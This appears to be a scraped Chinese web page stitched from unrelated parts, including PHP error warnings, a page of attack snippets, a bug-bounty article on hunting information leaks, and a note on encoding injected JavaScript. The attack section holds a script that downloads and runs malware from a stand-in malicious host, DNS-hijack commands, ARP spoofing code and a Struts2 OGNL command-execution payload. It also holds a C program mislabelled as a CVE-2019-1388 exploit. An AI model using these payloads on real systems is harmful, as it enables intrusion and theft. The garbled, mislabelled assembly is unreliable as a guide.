Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
供學(xué)習(xí)研究交流使用,切勿用于違法犯罪,為維護(hù)網(wǎng)絡(luò)安全做貢獻(xiàn)!
惡意軟件感染:
python
復(fù)制代碼
# 示例Python代碼,惡意軟件偽裝成合法軟件 import os def download_payload(): # 下載惡意軟件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 執(zhí)行下載的惡意軟件 os.system("malware.exe") download_payload() execute_payload()
提權(quán)方法:
示例漏洞:CVE-2019-1388
利用示例:
c
復(fù)制代碼
// Exploit.c: 利用CVE-2019-1388的UAC繞過(guò)漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize=sizeof(SHELLEXECUTEINFO); shExecInfo.fMask=SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd=NULL; shExecInfo.lpVerb="runas"; // 請(qǐng)求管理員權(quán)限 shExecInfo.lpFile="cmd.exe"; // 要運(yùn)行的程序 shExecInfo.lpParameters="/c net user hacker Password123! /add"; // 創(chuàng)建新用戶 shExecInfo.lpDirectory=NULL; shExecInfo.nShow=SW_SHOWNORMAL; shExecInfo.hInstApp=NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }
shell
復(fù)制代碼
gcc Exploit.c -o Exploit.exe Exploit.exe
使用命令提示符:
shell
復(fù)制代碼
# 修改DNS設(shè)置,將DNS服務(wù)器地址更改為攻擊者控制的DNS服務(wù)器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5
修改注冊(cè)表:
shell
復(fù)制代碼
# 示例命令,修改注冊(cè)表中的DNS設(shè)置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f
shell
復(fù)制代碼
# 使用nslookup識(shí)別DNS服務(wù)器 nslookup example.com
shell
復(fù)制代碼
# 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit
shell
復(fù)制代碼
# 例如,在BIND DNS服務(wù)器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析記錄 zone "example.com" { type master; file "/etc/bind/db.example.com"; };
ARP欺騙:
python
復(fù)制代碼
# 使用scapy庫(kù)進(jìn)行ARP欺騙 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response=ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:將目標(biāo)IP的網(wǎng)關(guān)MAC地址更改為攻擊者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')
捕獲HTTP流量:
shell
復(fù)制代碼
# 使用Wireshark或tcpdump捕獲HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'
使用Burp Suite攔截并修改HTTP響應(yīng):
html
復(fù)制代碼
<!-- 插入惡意JavaScript代碼的示例 --> <script>alert('This site is hacked');</script>
html
復(fù)制代碼
<!-- 示例:構(gòu)造包含惡意JavaScript代碼的輸入 --> <script>alert('XSS');</script>
javascript
復(fù)制代碼
// 分析廣告腳本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));
示例漏洞:CVE-2018-11776
利用示例:
http
復(fù)制代碼
POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
html
復(fù)制代碼
<!-- 替換廣告內(nèi)容為惡意廣告 --> <script src="http://malicious-website.com/malicious.js"></script>
html
復(fù)制代碼
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 惡意廣告加載 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>
通過(guò)詳細(xì)的步驟和代碼示例,我們可以更清楚地了解DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的實(shí)現(xiàn)方式。這些攻擊手段對(duì)用戶和網(wǎng)絡(luò)安全構(gòu)成嚴(yán)重威脅,但通過(guò)了解其原理和實(shí)現(xiàn)細(xì)節(jié),我們可以采取更有效的防護(hù)措施,保護(hù)我們的網(wǎng)絡(luò)環(huán)境和數(shù)據(jù)安全。如果你有任何問(wèn)題或想法,請(qǐng)?jiān)谠u(píng)論區(qū)分享,我們一起探討。
家好,我是劍影,這是我的第五篇原創(chuàng)文章。1月已經(jīng)過(guò)半,很多童鞋應(yīng)該都放寒假了,那么挖掘漏洞的時(shí)間就比較多啦,在挖掘的過(guò)程中,思路的積累以及創(chuàng)新是尤為重要的。在寫這篇文章前,我實(shí)際上還沒(méi)想好該寫什么內(nèi)容,然后回顧了以往挖掘各大SRC漏洞的歷程,覺(jué)得寫關(guān)于信息泄露這方面的問(wèn)題比較OK些,于是,我根據(jù)自己的挖掘思路和網(wǎng)上的思路做了一個(gè)總結(jié),希望能讓你們學(xué)有收獲。
信息漏洞的危害涉及到企業(yè)和用戶,一直以來(lái)都是高風(fēng)險(xiǎn)的問(wèn)題,本文章就兩個(gè)方向進(jìn)行講述挖掘信息泄露的那些思路。
Web方面的信息泄露
0x01 用戶信息泄露
①:評(píng)論處
第一點(diǎn):
一般用戶評(píng)論處用戶的信息都是加密的,比如顯示的是用戶手機(jī)號(hào)或郵箱等,就會(huì)直接對(duì)中間的一段數(shù)字進(jìn)行加密,但是有些可能就沒(méi)有加密,而是直接顯示出來(lái),那么這就造成了用戶信息泄露問(wèn)題。
第二點(diǎn):
如果加密不當(dāng),直接游覽用戶評(píng)論處時(shí)進(jìn)行抓包,然后查看返回包就可以直接看到明文,但有的時(shí)候會(huì)有2個(gè)參數(shù),就比如name:1333******1這個(gè)值是加密的,但后面還會(huì)有一個(gè)testname這個(gè)參數(shù)就沒(méi)有進(jìn)行加密,從而導(dǎo)致用戶信息泄露。這里有一些小技巧,就比如一個(gè)買賣市場(chǎng),他有用戶評(píng)論的地方,有一個(gè)秒殺搶購(gòu)成功的展示用戶的地方,還有一個(gè)是用戶相互交流的地方,一般白帽子測(cè)試了第一個(gè)功能處發(fā)現(xiàn)不存在問(wèn)題,然后就不繼續(xù)測(cè)試其它相同功能處了,這個(gè)疏忽就可能會(huì)導(dǎo)致錯(cuò)過(guò)一個(gè)發(fā)現(xiàn)問(wèn)題的機(jī)會(huì),每個(gè)功能處,加密機(jī)制有時(shí)候就會(huì)被漏掉,就比如用戶評(píng)論處用戶信息加了密,但是秒殺搶購(gòu)成功的展示用戶的地方卻沒(méi)有加密,所以白帽子要更細(xì)心點(diǎn)。
第三點(diǎn):
一般評(píng)論處都會(huì)有一個(gè)追加評(píng)論功能和一個(gè)商家回復(fù)功能,那么此時(shí)如果對(duì)這個(gè)功能參數(shù)沒(méi)有加以加密,那么通過(guò)抓包游覽查看返回包就可看到追加評(píng)論的用戶信息和商家信息。
第四點(diǎn):
有些評(píng)論功能當(dāng)中支持艾特(@)他人,那么在這個(gè)評(píng)論當(dāng)中你通過(guò)@他人,然后輸入信息點(diǎn)擊發(fā)送到評(píng)論處時(shí),通關(guān)抓包就可看到剛剛@的那個(gè)用戶的明文信息。
第五點(diǎn):
當(dāng)這個(gè)網(wǎng)站評(píng)論地方被搜索引擎爬蟲到了,那么可以嘗試?yán)盟阉髅顂ite:XXXX.com inurl:XX目錄在搜索引擎當(dāng)中搜索,如果加密不完全,那么就可以在搜索引擎當(dāng)中看到明文信息。關(guān)于這類的信息泄露問(wèn)題我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0104766.html
②:轉(zhuǎn)賬處
第一點(diǎn):
很多大型公司都有自家的金融平臺(tái),然后在轉(zhuǎn)賬處,當(dāng)你輸入對(duì)方的轉(zhuǎn)賬的賬戶,比如手機(jī)號(hào)或者郵箱,然后當(dāng)你點(diǎn)擊其它地方,它會(huì)向服務(wù)器發(fā)送一條驗(yàn)證信息,驗(yàn)證輸入的此賬戶是否存在,如果存在,返回對(duì)應(yīng)的手機(jī)號(hào)或者郵箱賬戶的用戶姓名,比如*王(1333333XXX)這樣的返回信息,那么如果此時(shí)前端加密不當(dāng),可以通過(guò)抓包攔截這條請(qǐng)求,查看返回信息,就可看到明文的姓名。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0124969.html
第二點(diǎn):
一般在轉(zhuǎn)賬處輸入手機(jī)號(hào)或郵箱賬戶的旁邊,有一個(gè)歷史轉(zhuǎn)賬信息,一個(gè)迷你的小頁(yè)面,當(dāng)你點(diǎn)擊后會(huì)看到之前轉(zhuǎn)賬成功的信息,但是,如果此頁(yè)面加密不全,那么在點(diǎn)擊查看歷史轉(zhuǎn)賬信息時(shí)直接抓包查看返回內(nèi)容就可看到明文的姓名。
③:搜索處
第一點(diǎn):
有些平臺(tái)內(nèi)置了搜索功能,跟搜索引擎思路很像,同樣也是隨意搜索,如果此時(shí)搜索的結(jié)果包含用戶信息這塊,那么就可能會(huì)導(dǎo)致用戶信息泄露問(wèn)題。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html
④:個(gè)人頁(yè)面處
第一點(diǎn):
在個(gè)人頁(yè)面當(dāng)中,直接游覽時(shí)直接抓包,查看返回包就可看到用戶信息是否未加密完全。比如一些金融APP,如果加密不當(dāng),當(dāng)點(diǎn)擊個(gè)人界面時(shí)通過(guò)抓包查看返回包就可看到明文的身份證信息和用戶名以及手機(jī)號(hào)。當(dāng)然這里不是只有涉及金融APP方面的才會(huì)有這個(gè)問(wèn)題,只要是可以查看個(gè)人頁(yè)面處都可能存在。
第二點(diǎn):
在查看銀行卡信息那里,一般都是加了密的,但查看銀行卡信息處時(shí)進(jìn)行抓包查看返回包的時(shí)候就可看到明文的銀行卡卡號(hào)信息和姓名信息。
⑤:客服處
第一點(diǎn):
這個(gè)問(wèn)題屬于客服安全方面意思不足,大一點(diǎn)的來(lái)看就是公司沒(méi)有對(duì)客服進(jìn)行安全培訓(xùn)等,當(dāng)你詢問(wèn)客服某手機(jī)號(hào)對(duì)應(yīng)的姓名時(shí),客服就會(huì)直接把姓名發(fā)你,當(dāng)然這要考驗(yàn)?zāi)闶窃趺磫?wèn)的了,還有如果失敗了不要放棄,換一個(gè)客服繼續(xù)測(cè)試。
越權(quán)方面的用戶信息泄露
①:任意查看
第一點(diǎn):
很多平臺(tái)需要進(jìn)行實(shí)名制認(rèn)證,在上傳實(shí)名制所需要的身份證照片等信息圖片時(shí),如果沒(méi)有對(duì)所產(chǎn)生的文件名格式進(jìn)行復(fù)雜化的話,那么極有可能會(huì)存在任意查看,通過(guò)批量的方式就可以進(jìn)行這些步驟,比如你上傳了圖片,服務(wù)器生成的圖片地址是XXX.com/xxx/xx/012313.jpg這樣短的數(shù)字格式文件名的話,就會(huì)存在該問(wèn)題。
第二點(diǎn):
購(gòu)物平臺(tái)當(dāng)中,在添加地址或修改地址的地方,如果權(quán)限沒(méi)過(guò)濾好,就可以越權(quán)進(jìn)行查看任意用戶的地址信息。
第三點(diǎn):
在某些平臺(tái)當(dāng)中,支持添加子賬戶,然后隨便添加一個(gè)子賬戶,然后在查看該子賬戶的時(shí)候進(jìn)行抓包,修改其ID值,就可以查看任意賬戶信息
第四點(diǎn):
有些平臺(tái)有操作日志或其它日志功能,那么如果此時(shí)對(duì)當(dāng)前用戶的權(quán)限過(guò)濾不當(dāng),那么就可以查看全部用戶操作時(shí)產(chǎn)生的日志,從而導(dǎo)致信息泄露。
第五點(diǎn):
在很多金融平臺(tái)當(dāng)中,在修改昵稱那里或者查看個(gè)人信息那里,提交時(shí)抓包,修改其用戶值為存在用戶的任意值,那么就可能造成查看任意用戶信息的問(wèn)題。
第六點(diǎn):
如果你進(jìn)入了一些內(nèi)部員工平臺(tái),那么如果具有搜索功能,就比如你輸入了員工工號(hào)然后它會(huì)返回這個(gè)員工的所有在職信息,那么此時(shí)你可以通過(guò)抓包批量進(jìn)行提交員工工號(hào),就可造成大范圍的信息泄露。
第七點(diǎn):
隨便買一個(gè)東西生成訂單,如果此時(shí)權(quán)限控制不當(dāng),就可以越權(quán)查看到任意用戶的訂單,那么信息也自認(rèn)而然的泄露出來(lái)了。關(guān)于這方面,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-083157.html
②:任意重置
第一點(diǎn):
如果權(quán)限控制不當(dāng),可導(dǎo)致任意用戶密碼修改的話,那么登錄后就可查看該用戶的任意信息,這也就導(dǎo)致了用戶信息泄露。
③:任意修改
第一點(diǎn):
在下單的時(shí)候修改其用戶ID為任意存在用戶的ID,然后下單,然后查看剛剛下單的信息,就可看到該用戶的收貨地址信息,只要對(duì)方設(shè)置了收貨地址。接口方面的用戶信息泄露
第一點(diǎn):
很多業(yè)務(wù)網(wǎng)站在上線的時(shí)候都忘記把測(cè)試時(shí)的接口進(jìn)行關(guān)閉,從而導(dǎo)致這個(gè)接口可以查詢大量用戶信息。那么此類接口怎么找呢?其中之一的方法通過(guò)Github.com網(wǎng)站進(jìn)行搜索相關(guān)域名進(jìn)行查找。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0116563.html注入方面的用戶信息泄露
第一點(diǎn):
注入可以說(shuō)是非常非常的嚴(yán)重,因?yàn)樽⑷胪寄艿玫胶芏嘈畔ⅲ绻麤](méi)做好相關(guān)過(guò)濾以及防護(hù),就可導(dǎo)致注入,從而數(shù)據(jù)庫(kù)內(nèi)的各種數(shù)據(jù)面對(duì)裸露的危險(xiǎn)。
以上就是關(guān)于挖掘用戶信息泄露方向的思路了,我試著努力回想,但目前只能總結(jié)到這幾個(gè)點(diǎn),如果還有更多思路,歡迎在評(píng)論處留言!
0x02 服務(wù)器路徑信息泄露
①:上傳圖片處
第一點(diǎn):
在上傳圖片處,這里我說(shuō)下最可能存在問(wèn)題的點(diǎn),就是關(guān)于上傳相關(guān)證明,進(jìn)行實(shí)名制上傳信息等功能頁(yè)面,在上傳圖片時(shí)進(jìn)行抓包,然后查看返回包,那么就可看到當(dāng)前服務(wù)器的絕對(duì)路徑信息。
②:XML處
第一點(diǎn):
一些XML限制或刪除不完全,可導(dǎo)致服務(wù)器等信息泄露。詳細(xì)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0123762.html
③:第三方的服務(wù)當(dāng)中
第一點(diǎn):
很多,如:Apache Tomcat、Struts2、CMS、zabix、Nginx等等,例如Nginx的某版本解析漏洞,就可造成路徑信息泄露。關(guān)于這方面我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2013-019253.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2012-04655.html
④:利用報(bào)錯(cuò)問(wèn)題
第一點(diǎn):
在處理報(bào)錯(cuò)信息的問(wèn)題上如果處理不當(dāng),就可導(dǎo)致路徑信息泄露,比如訪問(wèn)一些不存在的文件等思路。這里我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2012-010115.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2011-02219.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2012-09901.html
以上就是關(guān)于服務(wù)器路徑信息泄露問(wèn)題!
0x03 員工信息泄露
①:各第三方平臺(tái)當(dāng)中
第一點(diǎn):
Github,很不錯(cuò)的開(kāi)源社區(qū)平臺(tái)。一些員工喜歡將自己的信息上傳到這平臺(tái)上,但是往往忽視了安全,有時(shí)這上傳的代碼當(dāng)中就可能包含很多內(nèi)部測(cè)試員工的賬戶以及密碼信息等。關(guān)于這方面我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0177720.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2015-0164337.html
第二點(diǎn):
在搜索QQ群那里,通過(guò)搜索企業(yè)昵稱,往往都可以搜索出來(lái)關(guān)于企業(yè)員工或企業(yè)方面的信息,一般都會(huì)貼在公告當(dāng)中,比如某某測(cè)試賬戶等。當(dāng)然,你也可以申請(qǐng)加入群進(jìn)行查看群文件,看是否有銘感的信息。這里我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0128511.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2015-093927.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2016-0208105.html
第三點(diǎn):
百度貼吧當(dāng)中,一般都有公司員工創(chuàng)建的貼吧,如果安全意思不足,那么就會(huì)泄露相關(guān)員工工號(hào),可用作暴力破解的字典。
②:弱密碼問(wèn)題
第一點(diǎn):
在一些涉及內(nèi)部員工方面的系統(tǒng),如果員工密碼為弱密碼,那么就可通過(guò)暴力破解方式進(jìn)行嘗試登錄,如果成功爆破到了員工賬戶,那么一般只要是內(nèi)部員工系統(tǒng)該賬戶都可以登錄,那么所造成的影響也是很大的。
以上就是關(guān)于員工信息泄露的問(wèn)題!
0x04 數(shù)據(jù)庫(kù)信息以及服務(wù)器信息泄露
①:各第三方平臺(tái)當(dāng)中
第一點(diǎn):
Github,一些員工如果安全意識(shí)不足,同樣上傳的代碼當(dāng)中就包含了數(shù)據(jù)庫(kù)連接信息以及服務(wù)器信息。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0180848.html
第二點(diǎn):
利用搜索QQ群的思路,如果員工的安全意識(shí)不足,那么數(shù)據(jù)庫(kù)連接信息以及服務(wù)器信息就會(huì)在公告或群文件當(dāng)中
②:XML處
第一點(diǎn):
同樣在XML文件當(dāng)中,也可能會(huì)發(fā)現(xiàn)數(shù)據(jù)庫(kù)連接信息以及服務(wù)器信息。
③:svn處
第一點(diǎn):
svn是一個(gè)開(kāi)放源代碼的版本控制系統(tǒng),如果沒(méi)有加以限制或者刪除,那么就可以游覽相關(guān)的比較隱蔽性的源碼。關(guān)于這類的問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0199607.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191202.html
③:數(shù)據(jù)庫(kù)文件
第一點(diǎn):
一些數(shù)據(jù)庫(kù)相關(guān)文件如果刪除不當(dāng)或者擺放位置不當(dāng),那么極有可能被下載下來(lái),造成危害。關(guān)于這方面,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0158556.html
④:其它文件
第一點(diǎn):
比如其它類型的文件,如Txt、Doc、Excel等文件,如果包含銘感信息,那么危害也是顯而易見(jiàn)的。以上就是關(guān)于數(shù)據(jù)庫(kù)信息以及服務(wù)器信息泄露的問(wèn)題!
APP方面的信息泄露
0x01 敏感域名泄露
①:本地文件當(dāng)中
第一點(diǎn):
一些比較隱私性的域名可能會(huì)包含在APP本地文件當(dāng)中,比如某內(nèi)部員工登錄系統(tǒng)的APP,但是由于有證書校驗(yàn),你也抓不到數(shù)據(jù)包,此時(shí)你可以查看該APP的本地文件,然后就可看到本APP內(nèi)調(diào)用的是哪些域名,然后還有相關(guān)的域名。從APP內(nèi)提取域名的相關(guān)程序很多,Github很多,這里我提供一個(gè)某作者寫的Windows下的工具吧,需要Net環(huán)境哦,下載地址:https://pan.baidu.com/s/1slJaYnF
0x02 密碼泄露
第一點(diǎn):
手勢(shì)密碼也存在在本地文件當(dāng)中,如果沒(méi)最好相關(guān)校驗(yàn)或加密,那么手勢(shì)密碼就可能會(huì)泄露并且被利用。
第二點(diǎn):
一些APP問(wèn)題就是把用戶登錄的信息保存在本地,而且賬戶密碼都是以明文保存在本地文件或本地Sqlite數(shù)據(jù)庫(kù)當(dāng)中,很容易被利用。這里我找到了類似的例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2011-02915.html
第三點(diǎn):
同樣,一些APP也會(huì)把登錄成功的Cookie保存在本地,那么只要找到相關(guān)文件復(fù)制下來(lái)這個(gè)Cookie,就可以任意登錄了。
當(dāng)然,訪問(wèn)這些文件是需要ROOT權(quán)限的,以上就是APP方面的信息泄露問(wèn)題了!
總結(jié):
信息泄露不管是泄露哪方面的,都需要重視,信息一直伴隨著每個(gè)人到終身,如何才能保證在這個(gè)過(guò)程當(dāng)中不被泄露和利用,那么就需要各位白帽子來(lái)維護(hù)以及廠商來(lái)重視,讓信息化的今天,更安全。感謝那些支持我的朋友們,你們的一點(diǎn)點(diǎn)支持對(duì)我來(lái)說(shuō)都有著莫大的鼓勵(lì)。最后,發(fā)現(xiàn)問(wèn)題,解決問(wèn)題,讓世界更美,下次文章見(jiàn)~
登錄安全客 - 有思想的安全新媒體www.anquanke.com/,或下載安全客APP來(lái)獲取更多最新資訊吧~
假設(shè)需要劫持http響應(yīng)并在html頁(yè)面中注入一段js代碼后再傳回瀏覽器,實(shí)現(xiàn)在瀏覽器出現(xiàn)一個(gè)彈框消息提醒。
由于原始html頁(yè)面編碼格式存在UTF-8、GBK等多種編碼格式,如果注入的js包含中文消息的話,那么在UTF-8或GBK編碼的頁(yè)面就會(huì)有一個(gè)出現(xiàn)亂碼。有沒(méi)有辦法做到不管是針對(duì)GBK、UTF-8編碼的頁(yè)面都能做到正常顯示而不會(huì)出現(xiàn)亂碼哪?
首先來(lái)分析一下產(chǎn)生亂碼的原因,我們?cè)跒g覽器看到的信息都是通過(guò)圖形學(xué)手段在顯示器上呈現(xiàn)出來(lái)的,而實(shí)際保存在計(jì)算機(jī)硬件上的都是0和1(因?yàn)橛?jì)算機(jī)實(shí)現(xiàn)是基于二進(jìn)制),那么計(jì)算機(jī)要顯示、傳遞信息就需要依靠一套規(guī)則把一串串的0和1識(shí)別為正確的字符,這就是編碼。
例如01000001在ASCII編碼規(guī)則下對(duì)應(yīng)字母A。相同的0/1串,不同的編碼解析出的字符一般是不同的,因此如果html頁(yè)面按照UTF-8的編碼解析正常,那么按照GBK的編碼解析就會(huì)是亂碼了。根據(jù)上面的示意圖,假設(shè)注入的js代碼為utf-8編碼格式,而原始html編碼格式也為UTF-8編碼格式,那么最終注入這部分中的中文就能正常顯示,但是如果原始html為GBK編碼,那注入的這部分js代碼的中文就會(huì)顯示亂碼。
有一種unicode統(tǒng)一編碼字符集,目標(biāo)是把所有文字、字符統(tǒng)一編碼,也就是一串0/1組合在unicode字符集下對(duì)應(yīng)的字符是唯一的,不會(huì)存在歧義。而js是支持解析unicode字符的,那么就可以在注入js中把要顯示的消息統(tǒng)一轉(zhuǎn)換為unicode編碼,瀏覽器端去解析這個(gè)unicode編碼,這樣不管原始html是UTF-8還是GBK,都能正常顯示中文。
原始注入js代碼關(guān)于中文字符的部分
// utf-8編碼格式
let message="中文";
解決亂碼的注入js代碼關(guān)于中文字符的部分
// utf-8編碼格式
let message="\\u4e2d\\u6587"; // 這個(gè)編碼對(duì)應(yīng)上面的message"中文"
注意:
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。